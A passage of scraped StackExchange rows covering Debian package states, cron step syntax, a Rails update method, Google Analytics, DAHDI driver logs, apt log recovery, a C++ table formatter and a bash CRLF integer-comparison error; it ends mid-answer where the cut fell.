_unix.114192 | This is with reference to sudo: apt-get: command not found. after removing some packages. This user managed to break his system by installing some packages from wheezy on a squeeze system - not sure why or how. In any case, he has at least two packages which are not fully installed, and are in the state iU (i.e. unpacked only). What is an efficient way to list all packages that are not fully installed, or, putting it differently, partially installed?This seems like something that might have already been asked, but a quick search did not uncover anything. If it is a duplicate, please close. | Listing Debian packages which are not fully installed | debian;dpkg | From the dpkg man page -C, --audit Searches for packages that have been installed only partially on your system. dpkg will suggest what to do with them to get them working.So dpkg -C may work. However, I can't test this since I don't have any broken packages. |
_unix.230658 | When I run yum install X, where X can be tomcat or any other package, whats the user and the permission on the packages it downloads ? | Permissions and user for yum download | security;yum | null |
_codereview.172379 | I have to update user email and password if they are present in the params, I have other user information also which can be updated.this is the method I have written, but it doesn't seem like a good methoddef update if user_params[:current_email].present? if @current_user.has_valid_email?(user_params[:current_email]) @current_user.update(email: user_params[:new_email]) else render json: {errors: [Current Email did not match!]}, status: :unprocessable_entity and return end end if user_params[:current_password].present? if @current_user.has_valid_password?(user_params[:current_password]) @current_user.update(password: user_params[:new_password]) else render json: {errors: [Current Password did not match!]}, status: :unprocessable_entity and return end end if @current_user.update(sanitized_params) @web_user = @current_user render :show else render json: {errors: @current_user.errors.full_messages}, status: :unprocessable_entity end endprivate def sanitized_params user_params.slice!(:current_email,:new_email,:current_password,:new_password) end def user_params params.permit(:current_email, :new_email, :current_password, :new_password, :password_confirmation, :reminders_frequency, :coaching_style, :coaching_style_status,:suggestion_preference,:language,:region) end | Refactored code for updating user password, email and other info | ruby;ruby on rails | null |
_webmaster.108935 | I want to know what are the Google Analytics events related to users that are coming frequently i.e. more than 5 times to my website. Google Analytics tells the count of sessions related to the frequency of users (under Behavous> frequency & recency tab) but there is no way to know what are the actions done by the high-frequency users. | What are the events related to high-frequency users? | google analytics | null |
_reverseengineering.3865 | I'm trying to catch epilogue/prologue of functions in IDApython. Anyone got clue/snippet/algorithm of how should I do this? | Detecting epilogue/prologue of functions | ida;idapro plugins;idapython;static analysis;functions | null |
_webapps.70477 | Is there a way I can copy/paste or download old DM's from my iPhone 6? I can not see DM's as far back as I need on my computer. | Download direct messages from Twitter | twitter;twitter direct message | null |
_unix.229078 | I got a cron format like this:0 0 12 1/1 * ? *,How to read it and what does it mean.I understand things without slash but not this one. | cron job with slash | cron | Slashes means step values (has to be something that the maximum value of the element in question is divisible by) in which the execution will take place. First value is the range, so say 0-30, and the second value is the frequency, so for example 5. If the value was 0-30/5 in the minutes column, it would execute every five minutes between the range of 0-30 minutes.Question marks mean whenever the first execution takes place, it'll grab the corresponding value for the element using a question mark, and will put the value at that time into it. This means, say you start the execution via cron for the first time on a Monday and the day of the week value is a ?, it'll change it to a Monday so it runs on Monday permanently.Quick run-down of the values: 0 - first column means on the 0 minute - this is what minute to execute.0 - second column means on the 0 hour - this is the hour of execution.12 - this is the 12th day of the month - this is the day of the month to execute.1/1 - this means it wants it to be executed once a month (right hand side 1), and the range is locked down to the first month (left hand side 1). If my understanding is correct, this is the same as having 1 alone.* - this is the value for the day of the week - having an asterisk means it'll be repeated every day of the week.This looks like it'll run at 00:00 on the 12th of the first month in the year, regardless of the day of the week.I'm not sure why there are seven values, as standard cron files only have five or six values from what I'm aware (sixth being the year, as viewable in the documentation below - but is not included in standard/default deployments of cron). I'd also suggest having a read through the documentation, as it's great reference material for learning how they are structured:https://en.wikipedia.org/wiki/Cron |
_cogsci.165 | What are the works/papers/results/theories any expert in cognitive science should know, even if they're outside his/her specific field of expertise?One paper/theory per answer please, and state why do you find this work important to know (and ideally, not just because it has lots of citations, or because everyone teach it at Cognitive Science 101) | What are the Must Know papers of Cognitive Science? | cognitive psychology;reference request | null |
_scicomp.7189 | I am looking to port some code that resolves a set of partial differential equations (PDE) by the finite volume method in IMPLICIT form (for the time discretization).As result there is a tridiagonal system of equations in x,y,z directions which is handled by the ADI/TDMA scheme.I can not seem to find anything regarding implicit solution of PDEs with CUDA.Is the ADI/TDMA scheme possible to implement in CUDA?? Is there an example like 2D heat diffusion equation available somewhere??All I could find is a CUDA sample code for 2D heat diffusion equation in finite differences but in EXPLICIT form (University of Cambridge).Any hint/reference would be greatly appreciated. | cuda and numerical methods with implicit time discretization | parallel computing;implicit methods;cuda | null |
_unix.215215 | I was trying to install the normal map plugin for gimp, and I tried installing the package gimp-normalmap:i386 from the Software Manager on Linux Mint. As I was installing it, I realized that it was removing a number of important packages. One of my video editors, gimp, several python packages, and the cinnamon desktop environment. I closed out of the Software Manager as fast as I could (because there wasn't an abort button), but it had already removed most of those packages. It turns out that the package I was originally looking for was gimp-normalmap. Now I can't adjust anything that has to do with my desktop environment and all the settings are missing. What is the best way to restore all the packages removed by this software? Also, cinnamon is offered as a package in the Software Manager. Is it safe to install this? Preferably, I would also like to get back all the python files it removed, and I can't figure out which ones it did even if I go back to the package in the software manager. | How to restore packages removed by installing a program | linux mint;software installation;apt | I believe you can check what has been installed or uninstalled etc via the aptitude logs. You will need to be root or use sudo to view the log files.You can check the logs using this command:sudo cat /var/log/apt/term.logFor long log files u can pipe to more like this:sudo cat /var/log/apt/term.log | moreThen you can use space bar to page down, enter to go down 1 line at a time, and q to quit. There's lots more u can do via more. To learn more try and man, like this:man moreYou should be able to see what was uninstalled/removed. That way you can reinstall what you think you may need. Or just reinstall everything before you made that last change.If its been a while older logs are gzip'ed so u can go back in history as well. You will need to extract those before you can read them via cat or a text editor.Once you determine what was uninstalled you can reinstall them by using:sudo apt-get install --reinstall package1 package2package1 being one of the packages you saw in the log file, just list them all out using spaces between each one to install multiple packages at once. |
_unix.219921 | I use Asterisk 11 in my Ubuntu Server 14.04, but I Have some problems with my Dahdi Driver, with conflits Please see the dmesg (null) [ 11.804460] Adding 2052092k swap on /dev/mapper/asterisk--vg-swap_1. Priority:-1 extents:1 across:2052092k FS [ 12.027643] systemd-udevd[327]: starting version 204 [ 12.709180] lp: driver loaded but no devices found [ 12.715263] parport_pc 00:02: reported by Plug and Play ACPI [ 12.715315] parport0: PC-style at 0x378 (0x778), irq 7, using FIFO [PCSPP,TRISTATE,COMPAT,ECP] [ 12.812123] lp0: using parport0 (interrupt-driven). [ 12.818748] mei_me 0000:00:03.0: irq 44 for MSI/MSI-X [ 12.877965] Floppy drive(s): fd0 is 1.44M [ 12.922603] ACPI Warning: SystemIO range 0x0000000000000828-0x000000000000082F conflicts with OpRegion 0x0000000000000828-0x000000000000082D (\GLBC) (20140424/utaddress-254) [ 12.922609] ACPI Warning: SystemIO range 0x0000000000000828-0x000000000000082F conflicts with OpRegion 0x000000000000082A-0x000000000000082A (\SACT) (20140424/utaddress-254) [ 12.922613] ACPI Warning: SystemIO range 0x0000000000000828-0x000000000000082F conflicts with OpRegion 0x0000000000000828-0x0000000000000828 (\SSTS) (20140424/utaddress-254) [ 12.922617] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 12.922621] ACPI Warning: SystemIO range 0x00000000000008B0-0x00000000000008BF conflicts with OpRegion 0x00000000000008B8-0x00000000000008BB (\GIC2) (20140424/utaddress-254) [ 12.922624] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 12.922626] ACPI Warning: SystemIO range 0x0000000000000880-0x00000000000008AF conflicts with OpRegion 0x000000000000088C-0x000000000000088F (\GIC1) (20140424/utaddress-254) [ 12.922630] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 12.922631] lpc_ich: Resource conflict(s) found affecting gpio_ich [ 13.038153] shpchp: Standard Hot Plug PCI Controller Driver version: 0.4 [ 13.117951] dcdbas dcdbas: Dell Systems Management Base Driver (version 5.6.0-3.2) [ 13.216281] ppdev: user-space parallel port driver [ 13.272719] audit: type=1400 audit(1438608815.729:2): apparmor=STATUS operation=profile_load profile=unconfined name=/sbin/dhclient pid=368 comm=apparmor_parser [ 13.272726] audit: type=1400 audit(1438608815.729:3): apparmor=STATUS operation=profile_load profile=unconfined name=/usr/lib/NetworkManager/nm-dhcp-client.action pid=368 comm=apparmor_parser [ 13.272732] audit: type=1400 audit(1438608815.729:4): apparmor=STATUS operation=profile_load profile=unconfined name=/usr/lib/connman/scripts/dhclient-script pid=368 comm=apparmor_parser [ 13.272742] audit: type=1400 audit(1438608815.729:5): apparmor=STATUS operation=profile_replace profile=unconfined name=/sbin/dhclient pid=367 comm=apparmor_parser [ 13.272749] audit: type=1400 audit(1438608815.729:6): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/NetworkManager/nm-dhcp-client.action pid=367 comm=apparmor_parser [ 13.272755] audit: type=1400 audit(1438608815.729:7): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/connman/scripts/dhclient-script pid=367 comm=apparmor_parser [ 13.273205] audit: type=1400 audit(1438608815.729:8): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/NetworkManager/nm-dhcp-client.action pid=368 comm=apparmor_parser [ 13.273210] audit: type=1400 audit(1438608815.729:9): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/connman/scripts/dhclient-script pid=368 comm=apparmor_parser [ 13.273227] audit: type=1400 audit(1438608815.729:10): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/NetworkManager/nm-dhcp-client.action pid=367 comm=apparmor_parser [ 13.273233] audit: type=1400 audit(1438608815.729:11): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/connman/scripts/dhclient-script pid=367 comm=apparmor_parser [ 13.313689] [drm] Initialized drm 1.1.0 20060810 [ 13.492498] kvm: disabled by bios [ 13.674866] snd_hda_intel 0000:00:1b.0: irq 45 for MSI/MSI-X [ 13.740542] r8169 0000:03:02.0 eth1: link down [ 13.740557] r8169 0000:03:02.0 eth1: link down [ 13.740587] IPv6: ADDRCONF(NETDEV_UP): eth1: link is not ready [ 13.769644] Velocity is AUTO mode [ 13.784400] coretemp coretemp.0: Using relative temperature scale! [ 13.784413] coretemp coretemp.0: Using relative temperature scale! [ 14.093137] [drm] Memory usable by graphics device = 512M [ 14.093143] checking generic (d0000000 300000) vs hw (d0000000 10000000) [ 14.093145] fb: switching to inteldrmfb from VESA VGA [ 14.093183] Console: switching to colour dummy device 80x25 [ 14.093311] [drm] Replacing VGA console driver [ 14.116059] i915 0000:00:02.0: irq 46 for MSI/MSI-X [ 14.116069] [drm] Supports vblank timestamp caching Rev 2 (21.10.2013). [ 14.116070] [drm] Driver supports precise vblank timestamp query. [ 14.116143] vgaarb: device changed decodes: PCI:0000:00:02.0,olddecodes=io+mem,decodes=io+mem:owns=io+mem [ 14.117085] [drm] initialized overlay support [ 14.164931] sound hdaudioC0D0: autoconfig: line_outs=1 (0x12/0x0/0x0/0x0/0x0) type:line [ 14.164936] sound hdaudioC0D0: speaker_outs=1 (0x13/0x0/0x0/0x0/0x0) [ 14.164939] sound hdaudioC0D0: hp_outs=1 (0x11/0x0/0x0/0x0/0x0) [ 14.164941] sound hdaudioC0D0: mono: mono_out=0x0 [ 14.164943] sound hdaudioC0D0: inputs: [ 14.164945] sound hdaudioC0D0: Mic=0x14 [ 14.164947] sound hdaudioC0D0: Line=0x15 [ 14.172144] input: HDA Intel Mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input7 [ 14.172977] input: HDA Intel Line as /devices/pci0000:00/0000:00:1b.0/sound/card0/input8 [ 14.173069] input: HDA Intel Line Out as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 [ 14.174879] input: HDA Intel Front Headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input10 [ 14.236951] fbcon: inteldrmfb (fb0) is primary device [ 14.253794] Console: switching to colour frame buffer device 160x50 [ 14.256574] i915 0000:00:02.0: fb0: inteldrmfb frame buffer device [ 14.256576] i915 0000:00:02.0: registered panic notifier [ 14.260148] [drm] Initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 15.430560] EXT4-fs (dm-0): re-mounted. Opts: errors=remount-ro [ 15.500869] r8169 0000:03:02.0 eth1: link up [ 15.500879] IPv6: ADDRCONF(NETDEV_CHANGE): eth1: link becomes ready [ 15.771290] EXT4-fs (sda1): mounting ext2 file system using the ext4 subsystem [ 15.900036] floppy0: no floppy controllers found [ 15.964264] EXT4-fs (sda1): mounted filesystem without journal. Opts: (null) [ 16.222275] init: failsafe main process (708) killed by TERM signal [ 16.567280] eth0: Link auto-negotiation speed 1000M bps full duplex [ 21.311317] ip_tables: (C) 2000-2006 Netfilter Core Team [ 21.363286] nf_conntrack version 0.5.0 (16384 buckets, 65536 max) [ 21.562313] init: plymouth-upstart-bridge main process ended, respawning [ 492.184127] init: tty1 main process ended, respawningAfter then I run dahdi_cfg -vvv my Dahdi CLI back, but the problem continue [ 11.503468] kvm: disabled by bios [ 11.507542] coretemp coretemp.0: Using relative temperature scale! [ 11.507556] coretemp coretemp.0: Using relative temperature scale! [ 11.518417] vgaarb: device changed decodes: PCI:0000:00:02.0,olddecodes=io+mem,decodes=io+mem:owns=io+mem [ 11.520280] [drm] initialized overlay support [ 11.527372] dcdbas dcdbas: Dell Systems Management Base Driver (version 5.6.0-3.2) [ 11.590852] ppdev: user-space parallel port driver [ 11.597260] audit: type=1400 audit(1438610748.051:2): apparmor=STATUS operation=profile_load profile=unconfined name=/sbin/dhclient pid=367 comm=apparmor_parser [ 11.597268] audit: type=1400 audit(1438610748.051:3): apparmor=STATUS operation=profile_load profile=unconfined name=/usr/lib/NetworkManager/nm-dhcp-client.action pid=367 comm=apparmor_parser [ 11.597274] audit: type=1400 audit(1438610748.051:4): apparmor=STATUS operation=profile_load profile=unconfined name=/usr/lib/connman/scripts/dhclient-script pid=367 comm=apparmor_parser [ 11.597283] audit: type=1400 audit(1438610748.051:5): apparmor=STATUS operation=profile_replace profile=unconfined name=/sbin/dhclient pid=368 comm=apparmor_parser [ 11.597291] audit: type=1400 audit(1438610748.051:6): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/NetworkManager/nm-dhcp-client.action pid=368 comm=apparmor_parser [ 11.597296] audit: type=1400 audit(1438610748.051:7): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/connman/scripts/dhclient-script pid=368 comm=apparmor_parser [ 11.597749] audit: type=1400 audit(1438610748.051:8): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/NetworkManager/nm-dhcp-client.action pid=367 comm=apparmor_parser [ 11.597755] audit: type=1400 audit(1438610748.051:9): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/connman/scripts/dhclient-script pid=367 comm=apparmor_parser [ 11.597767] audit: type=1400 audit(1438610748.051:10): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/NetworkManager/nm-dhcp-client.action pid=368 comm=apparmor_parser [ 11.597772] audit: type=1400 audit(1438610748.051:11): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/connman/scripts/dhclient-script pid=368 comm=apparmor_parser [ 11.632943] fbcon: inteldrmfb (fb0) is primary device [ 11.649799] Console: switching to colour frame buffer device 160x50 [ 11.652579] i915 0000:00:02.0: fb0: inteldrmfb frame buffer device [ 11.652581] i915 0000:00:02.0: registered panic notifier [ 11.666480] [drm] Initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 11.666586] ACPI Warning: SystemIO range 0x0000000000000828-0x000000000000082F conflicts with OpRegion 0x0000000000000828-0x000000000000082D (\GLBC) (20140424/utaddress-254) [ 11.666592] ACPI Warning: SystemIO range 0x0000000000000828-0x000000000000082F conflicts with OpRegion 0x000000000000082A-0x000000000000082A (\SACT) (20140424/utaddress-254) [ 11.666596] ACPI Warning: SystemIO range 0x0000000000000828-0x000000000000082F conflicts with OpRegion 0x0000000000000828-0x0000000000000828 (\SSTS) (20140424/utaddress-254) [ 11.666600] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 11.666603] ACPI Warning: SystemIO range 0x00000000000008B0-0x00000000000008BF conflicts with OpRegion 0x00000000000008B8-0x00000000000008BB (\GIC2) (20140424/utaddress-254) [ 11.666607] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 11.666609] ACPI Warning: SystemIO range 0x0000000000000880-0x00000000000008AF conflicts with OpRegion 0x000000000000088C-0x000000000000088F (\GIC1) (20140424/utaddress-254) [ 11.666613] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 11.666614] lpc_ich: Resource conflict(s) found affecting gpio_ich [ 11.670169] snd_hda_intel 0000:00:1b.0: irq 46 for MSI/MSI-X [ 12.009628] r8169 0000:03:02.0 eth1: link down [ 12.009643] r8169 0000:03:02.0 eth1: link down [ 12.009680] IPv6: ADDRCONF(NETDEV_UP): eth1: link is not ready [ 12.037647] Velocity is AUTO mode [ 12.057030] sound hdaudioC0D0: autoconfig: line_outs=1 (0x12/0x0/0x0/0x0/0x0) type:line [ 12.057034] sound hdaudioC0D0: speaker_outs=1 (0x13/0x0/0x0/0x0/0x0) [ 12.057037] sound hdaudioC0D0: hp_outs=1 (0x11/0x0/0x0/0x0/0x0) [ 12.057039] sound hdaudioC0D0: mono: mono_out=0x0 [ 12.057041] sound hdaudioC0D0: inputs: [ 12.057044] sound hdaudioC0D0: Mic=0x14 [ 12.057046] sound hdaudioC0D0: Line=0x15 [ 12.068312] input: HDA Intel Mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input7 [ 12.068434] input: HDA Intel Line as /devices/pci0000:00/0000:00:1b.0/sound/card0/input8 [ 12.068543] input: HDA Intel Line Out as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 [ 12.068648] input: HDA Intel Front Headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input10 [ 12.450564] EXT4-fs (dm-0): re-mounted. Opts: errors=remount-ro [ 13.032211] EXT4-fs (sda1): mounting ext2 file system using the ext4 subsystem [ 13.178789] EXT4-fs (sda1): mounted filesystem without journal. Opts: (null) [ 13.373777] init: failsafe main process (695) killed by TERM signal [ 13.522415] r8169 0000:03:02.0 eth1: link up [ 13.522425] IPv6: ADDRCONF(NETDEV_CHANGE): eth1: link becomes ready [ 14.396050] floppy0: no floppy controllers found [ 15.070379] eth0: Link auto-negotiation speed 1000M bps full duplex [ 19.785242] ip_tables: (C) 2000-2006 Netfilter Core Team [ 19.793870] nf_conntrack version 0.5.0 (16384 buckets, 65536 max) [ 19.960708] init: plymouth-upstart-bridge main process ended, respawning [ 539.437379] dahdi: module verification failed: signature and/or required key missing - tainting kernel [ 539.438150] dahdi: Version: 2.10.2 [ 539.438357] dahdi: Telephony Interface Registered on major 196 [ 540.007096] wctdm24xxp 0000:03:00.0: Port 1: Installed -- AUTO FXO (FCC mode) [ 540.007101] wctdm24xxp 0000:03:00.0: Port 2: Not installed [ 540.007103] wctdm24xxp 0000:03:00.0: Port 3: Not installed [ 540.007106] wctdm24xxp 0000:03:00.0: Port 4: Not installed [ 542.480446] wctdm24xxp 0000:03:00.0: Found a Wildcard TDM: Wildcard TDM410P (0 BRI spans, 1 analog channel) [ 542.489848] dahdi_transcode: Loaded. [ 542.494830] INFO-xpp: revision Unknown MAX_XPDS=64 (8*8) [ 542.494842] INFO-xpp: FEATURE: with PROTOCOL_DEBUG [ 542.494881] INFO-xpp: FEATURE: with sync_tick() from DAHDI [ 542.496867] INFO-xpp_usb: revision Unknown [ 542.496947] usbcore: registered new interface driver xpp_usb [ 542.556913] dahdi_devices pci:0000:03:00.0: local span 1 is already assigned span 1 [ 542.601238] dahdi_echocan_mg2: Registered echo canceler 'MG2'How can I fix this permanent? | lpc_ich: Resource conflict(s) found affecting gpio_ich | ubuntu;asterisk | null |
_hardwarecs.1204 | Consider an user that mainly uses his notebook for: surf the web open 4~6 browsers tabs (ex: google + youtube + amazon + static pages) run msoffice apps (ex: excel + powerpoint + email) watch videos For such users, is there already in the market a tablet with the same performance of standard notebooks? ps: Budget is not a constraint (say < US$5000). Of course the cheapest would be better. | Tablet vs Laptop | laptop;performance;tablet | Nowadays, many tablets have the same, or more, performance than laptops.The Microsoft Surface Pro 4 is a very good option for portability and performance. It has a beautiful screen, a powerful processor and a generally well built device. |
_webmaster.68986 | I have a website with share-friendly URLs like example.com/registerI implemented A/B testing as a cookie because I don't want ugly unsharable URLs like example.com/registerA and example.com/registerB.What is the best practice to see A/B testing in Google Analytics, even though the URL is the same? | Google Analytics for cookie-based A/B testing (same URL for A and B) | google analytics;url;cookie;a b testing | Google's Content Experiments is meant for separate A/B URLs, but it can be hacked to use the same URL, as described in this article.The general idea is to:Use the usual Content Experiments wizard,Fill the 2 A/B URL fields with dummy URLs,Insert JavaScript code to modify page content on the client side.Thanks Eike for the link! |
_codereview.67117 | The goal of my program is take some headers and fields and display a nicely formatted table like this:+----------+----------+----------+|First name|Last name |Middle || | |initial |+----------+----------+----------+|This is a |This is a |This is an||line. |longer |even || |line. |longer || | |line. |+----------+----------+----------+Certain features aren't implemented yet, so this code review should focus on what is implemented.As we all know, premature optimization is the root of all evil, but as the program scales, I think it's important to take into consideration what parts of the program might present a bottleneck or be inefficient. For example:Prefer to pass by value in C++11. Is pass-by-value a reasonable default in C++11?void display_boxed(std::vector<std::string> fields, int column_width = 10)Here I pass fields by value to enable move semantics and because I modify fields in the algorithm. If I passed it by reference, it would be incorrect because the changes would reflect upon the caller's copy. If I passed it by const& reference, I would have to initialize a local variable since the parameter would be const. Is the correct thinking?Minimize temporaries/copies. I would like comments on how parts of my code could be improved to achieve this goal.Then I would like to focus on another aspect: scalability.As many of us have suffered through before, we start writing code and then realize that in order to accommodate different requirements, a large of refactoring has to be done. Is my code scalable?Code reuse. How can I refactor my code to mitigate code reuse?And finally, in general, I'd just like comments on the algorithm and how it can be improved.#include <algorithm>#include <iomanip>#include <iostream>#include <sstream>#include <string>#include <vector>// http://rosettacode.org/wiki/Word_wrap#C.2B.2Bstd::string wrap(const char *text, size_t line_length = 72){ std::istringstream words(text); std::ostringstream wrapped; std::string word; if (words >> word) { wrapped << word; size_t space_left = line_length - word.length(); while (words >> word) { if (space_left < word.length() + 1) { wrapped << '\n' << word; space_left = line_length - word.length(); } else { wrapped << ' ' << word; space_left -= word.length() + 1; } } } return wrapped.str();};void display_boxed(std::vector<std::string> fields, int column_width = 10){ // TODO: Center justify for headers. auto adjustfield = std::left; int max_linebreaks = 0; for (auto&& str : fields) { int count = std::count(str.begin(), str.end(), '\n'); if (count > max_linebreaks) max_linebreaks = count; } // We're operating on a copy so it's OK to change the elements // of fields. for (int i = 0; i <= max_linebreaks; ++i) { std::cout << |; for (std::vector<std::string>::size_type j = 0; j < fields.size(); ++j) { auto it = std::find(fields[j].begin(), fields[j].end(), '\n'); if (it != fields[j].end()) { std::string s{fields[j].begin(), it}; std::cout << std::setw(column_width) << adjustfield << s << |; fields[j] = std::string{it + 1, fields[j].end()}; } else { std::cout << std::setw(column_width) << adjustfield << fields[j] << |; fields[j] = ; } } std::cout << \n; }}int main(){ // TODO: Generate column_width. constexpr int column_width = 10; std::vector<std::string> headers; headers.emplace_back(wrap(First name, column_width)); headers.emplace_back(wrap(Last name, column_width)); headers.emplace_back(wrap(Middle initial, column_width)); // TODO:: Account for more than 3 fields. std::vector<std::string> fields; fields.emplace_back(wrap(This is a line., column_width)); fields.emplace_back(wrap(This is a longer line., column_width)); fields.emplace_back(wrap(This is an even longer line., column_width)); std::string horiz_linebr(+); for (std::vector<std::string>::size_type j = 0; j < fields.size(); ++j) { horiz_linebr += std::string(column_width, '-'); horiz_linebr += +; } horiz_linebr += \n; std::cout << horiz_linebr; display_boxed(headers); std::cout << horiz_linebr; display_boxed(fields); std::cout << horiz_linebr; return 0;} | Formatting database like table | c++;optimization;algorithm;c++11 | null |
_unix.150448 | I installed a new icon set (numix), however not all icons were changed (e.g. the software manager). How can I manually change icons? | Change icons of application in Linux Mint | linux mint;icons | One way of finding the location of the icon for an application is to add it to the panel (right click > add to panel) and then right click on the newly added icon to edit it. By clicking on the icon in Launcher Properties you'll get its location. For instance mintInstall is found in /usr/lib/linuxmint/mintInstall/icon.svgHaving this you can then replace the icon with you own file and you can remove the application from the panel again. |
_unix.145223 | So I when I run this code on my mac there are no errors, and it provides me the perfect output. But when I run it on Ubuntu or CentOS i get the following errorinteger expression expected #!/bin/bashif [ -f $1 ] ;then sum=0 echo #Name Surname City Amount while read -r LINE || [[ -n $LINE ]]; do firstName=$( echo $LINE | cut -d -f1) lastName=$( echo $LINE | cut -d -f2) city=$( echo $LINE | cut -d -f3) amount=$( echo $LINE | cut -d -f9) check=$( echo $amount | grep -c [0-9]) if [ $check -gt 0 ]; then if [ $amount -gt 999 ] ; then state=$(echo $LINE | cut -d -f5) correctState=$(echo $state | grep -c ^N[YCEJ]) if [ $correctState -gt 0 ] ; then echo $firstName $lastName $state $city $amount sum=`expr $sum + $amount` fi fi fi done < $1 echo echo The sum is all printed amounts is $sum echo else echo No file foundfiInput File: #Name Surname City Company State Probability Units Price AmountTony Passaquale Edenvale Sams_Groceries_Inc. NJ 90 800 4.78 3824Nigel Shanford Atlanta Fulton_Hotels_Inc. GA 40 400 9.99 3996Selma Cooper Eugene Cooper_Inns OR 40 1000 9.99 9990Allen James San_Jose City_Center_Lodge CA 40 1000 9.99 9990Bruce Calaway Irvine Penny_Tree_Foods CA 80 1000 4.99 4990Gloria Lenares Chicago Cordoba_Coffee_Shops IL 60 200 9.99 1998Wendy Leach New_York Gourmet_Imports NY 100 100 10 1000Craig Flanders Omaha Fly_n_Buy NE 40 1200 9.49 11388Montgomery Weissenborn Chicago Shariott_Suites_Hotels IL 60 400 7.98 3192Shirley Brightwell San_Francisco Pacific_Cafe_Company CA 80 2900 1.75 5075Roger Vittorio Cleveland National_Associa OH 40 1000 9.99 9990Tony Passaquale Edenvale Sams_Groceries NJ 90 1000 2.29 2290Montgomery Weissenborn Los_Angeles Shariott_Suites_Hotels CA 90 5000 1.49 7450Michael Wiggum Los_Angeles Trader_Depot CA 70 800 2.5 2000Edna Brock Raleigh Elliott's_Department_Stores NC 70 14400 1.78 25632Gloria Lenares Chicago Cordoba_Coffee_Shops IL 90 600 8.99 5394Montgomery Weissenborn Seattle Shariott_Suites_Hotels WA 90 400 8.99 3596Beth Munin Seattle Little_Corner_Sweets WA 100 400 1.39 556Tim Kelly New_York Nuts_and_Things NY 60 100 9.99 999Bart Perryman San_Francisco Kwik-e-mart CA 90 40000 0.69 27600Stacey Gordon Irvine Penny_Tree_Foods CA 70 200 12.96 2592Heather Willis Atlanta Big_Chuck_Diners GA 80 400 4.99 1996Tim Kelly New_York Nuts_and_Things NY 70 600 1.49 894Ralph Khan New_York Gigamart NY 30 600 9.99 5994Joshua Newsom New_York Trader_Depot NY 90 800 7.99 6392Edna Brock Raleigh Elliott's_Department_Stores NC 90 9200 1.88 17296Edna Brock Raleigh Elliott's_Department_Stores NC 100 4400 1.98 8712Michael Wiggum Los_Angeles Trader_Depot CA 100 600 2.5 1500Joshua Newsom New_York Trader_Depot NY 90 600 2.5 1500Edna Brock Raleigh Elliott's_Department_Stores NC 100 8800 1.68 14784Heather Willis Atlanta Big_Chuck_Diners GA 100 200 4.99 998Beth Munin Seattle Little_Corner_Sweets WA 100 200 2.49 498Shirley Brightwell San_Francisco Pacific_Cafe_Company CA 100 1200 1.89 2268Tim Kelly New_York Nuts_and_Things NY 90 14000 2.29 32060Output( expected) this works only on Mac#Name Surname City AmountTony Passaquale NJ Edenvale 3824Wendy Leach NY New_York 1000Craig Flanders NE Omaha 11388Tony Passaquale NJ Edenvale 2290Edna Brock NC Raleigh 25632Ralph Khan NY New_York 5994Joshua Newsom NY New_York 6392Edna Brock NC Raleigh 17296Edna Brock NC Raleigh 8712Joshua Newsom NY New_York 1500Edna Brock NC Raleigh 14784Tim Kelly NY New_York 32060The sum is all printed amounts is 130872Output( on Ubuntu or CentOSX) #Name Surname City Amount: integer expression expected: integer expression expected: integer expression expected./script.sh: line 13: [: 9.99: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expected: integer expression expectedThe sum is all printed amounts is 0 | Solution to integer expression expected | bash;scripting;grep | If you see : integer expression expected, it's a sign that what's before the : ends with a carriage return character. A carriage return causes your terminal to overwrite the current line with the subsequent text, so if a field contains something like 1234 where is a carriage return, the shell displays the error message 1234: integer expression expected, and the 1234 is overwritten by : in.You're getting a carriage return because your input file is a Windows text file and this is the last field on the line. To use the file under Linux or Cygwin, you need to convert it to a Unix text file. Windows text files use the two-character sequence CR-LF (carriage return, line feed) to mark the end of a line. Unix text files use the single character LF. So when Linux sees a Windows text file, it sees that each line is terminated by a CR character which is a valid character, but rarely a desired one, and is not a valid character in an integer.The message 9.99: integer expression expected shows that there's a line where 9.99 is in the 9th field. From your sample data it looks like this is expected in the 8th field, so you have a line with bad data (probably a spurious space one of the name fields).Your script is very cumbersome. Don't check whether the argument is a regular file: this serves no useful purpose (the redirection will fail if the file doesn't exist) and makes it impossible to use a pipe as input. Don't use cut to parse fields: read can do it (assuming there are no empty fields). The || [[ -n $LINE ]] fragment doesn't do anything useful (but do make sure that your input is a valid text file; in a valid non-empty text file, the last character is LF). Use shell arithmetic instead of expr. As a general principle, use double quotes around variable substitutions (though here it won't matter with valid data but consider what could happen if someone wrote * in a field). Untested rewrite:#!/bin/bashset -esum=0echo #Name Surname City Amountwhile read -r firstName lastName city f4 state f6 f7 f8 amount; do if [ $amount -gt 999 ] ; then case $state in N[YCEJ]) echo $firstName $lastName $state $city $amount sum=$((sum + amount));; esac fidone < $1echo echo The sum is all 